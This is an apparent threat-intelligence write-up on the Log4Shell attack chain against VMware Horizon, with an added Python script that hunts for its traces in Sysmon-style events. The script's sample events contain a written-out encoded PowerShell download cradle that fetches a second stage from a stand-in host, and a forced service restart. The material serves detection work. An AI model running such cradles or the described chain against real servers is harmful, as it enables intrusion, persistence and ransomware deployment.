Initial Access Broker (IAB) group Prophet Spider and an unknown threat group are actively attempting to exploit the Log4j vulnerability (Log4Shell) in VMware Horizon.

In ongoing campaigns, the attackers initiate the attack with a Log4Shell payload similar to $ against vulnerable VMware Horizon servers.

The attack exploits the Log4Shell vulnerability in the Apache Tomcat service embedded in VMware Horizon: the vulnerable log4j lookup makes the Horizon server call back to an attacker-controlled server over LDAP and load a malicious Java class.

The malicious Java class abuses the ws_TomcatService.exe process to spawn cmd.exe or powershell.exe as child processes, and goes on to inject a web shell into absg-worker.js, the Blast Secure Gateway worker script.

The VMBlastSG (VMware Blast Secure Gateway) service is then forcibly restarted so that the Blast Secure Gateway listener comes up on port 8443 for any IP address with the web shell loaded. This gives the attacker a stealthy persistence mechanism.

Post exploitation, the threat actors run encoded PowerShell commands to download a second-stage payload (Cobalt Strike beacons, a crypto miner or ransomware) to the victim systems.
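The chain above leaves a small set of host artifacts that are easy to hunt for: ws_TomcatService.exe spawning a shell, an encoded PowerShell command line, a write to absg-worker.js, and a service-control restart of VMBlastSG. The script below is an added example (not code from the original post or from any vendor) that runs that detection logic over Sysmon-style process-creation (Event ID 1) and file-create (Event ID 11) records. The records, the install paths and the 198.51.100.7 download host are constructed for the example; the only things taken from the text are the process, file and service names and the encoded-PowerShell technique.

```python
"""Hunt for the VMware Horizon Log4Shell post-exploitation chain in
Sysmon-style event records.  Added example: the events below are
constructed, not real telemetry, and the Horizon install paths are
assumptions about a default Connection Server layout."""
import base64
import re

TOMCAT = "ws_tomcatservice.exe"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
BLAST_WORKER = "absg-worker.js"

# powershell.exe accepts abbreviated forms of -EncodedCommand (-e, -ec, -en,
# -enc ...), so match the switch loosely and capture the base64 blob.
ENC_RE = re.compile(r"(?i)(?:^|\s)[-/]e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
# sc/net stop|start or *-Service cmdlets naming the Blast Secure Gateway service.
SVC_RE = re.compile(
    r"(?i)(?:\b(?:sc|net)(?:\.exe)?\s+(?:stop|start)\b|\b(?:restart|stop|start)-service\b)"
    r".*\bvmblastsg\b")


def encode_ps(cmd):
    """UTF-16LE + base64, exactly what -EncodedCommand expects (used only to
    build the constructed sample)."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


def decode_ps(b64):
    """Inverse of encode_ps; None when the blob is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event):
    """Return a list of (finding, detail) tuples for one event."""
    findings = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    if event.get("EventID") == 1:
        if parent == TOMCAT and image in SHELLS:
            findings.append(("tomcat_spawns_shell", f"{parent} -> {image}"))
        m = ENC_RE.search(cmdline)
        if m:
            decoded = decode_ps(m.group(1))
            findings.append(("encoded_powershell", decoded or "<undecodable blob>"))
        if SVC_RE.search(cmdline):
            findings.append(("blast_gateway_restart", cmdline))
    elif event.get("EventID") == 11:
        if basename(event.get("TargetFilename", "")) == BLAST_WORKER:
            findings.append(("blast_worker_modified", f"written by {image}"))
    return findings


def scan(events):
    """Run analyze() over a sequence of events; yields (index, finding)."""
    return [(i, f) for i, e in enumerate(events) for f in analyze(e)]


# Constructed sample: a download cradle for a second stage, encoded the way
# the actors' encoded PowerShell commands are.  Host address is TEST-NET-2.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage2.ps1')"
HORIZON = r"C:\Program Files\VMware\VMware View\Server"  # assumed install root
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # 0: normal service start of Tomcat, nothing to flag
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": HORIZON + r"\bin\ws_TomcatService.exe", "CommandLine": "ws_TomcatService.exe"},
    # 1: the loaded Java class makes Tomcat spawn cmd.exe with an encoded payload
    {"EventID": 1, "ParentImage": HORIZON + r"\bin\ws_TomcatService.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell.exe -nop -w hidden -enc " + encode_ps(STAGE2)},
    # 2: the resulting powershell.exe process
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_ps(STAGE2)},
    # 3: forced restart of the Blast Secure Gateway service
    {"EventID": 1, "ParentImage": PS, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c sc stop VMBlastSG && sc start VMBlastSG"},
    # 4: Tomcat writing the web shell into the Blast worker script
    {"EventID": 11, "Image": HORIZON + r"\bin\ws_TomcatService.exe",
     "TargetFilename": HORIZON + r"\appblastgateway\lib\absg-worker.js"},
    # 5: benign admin PowerShell, must not trigger the encoded-command rule
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for idx, (kind, detail) in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {kind}: {detail}")
```

On a live host the same rules map directly onto a Sysmon or EDR query: parent image ws_TomcatService.exe with a cmd.exe or powershell.exe child is the highest-fidelity signal, and decoding the -enc blob is what turns a generic "encoded PowerShell" alert into the actual second-stage URL.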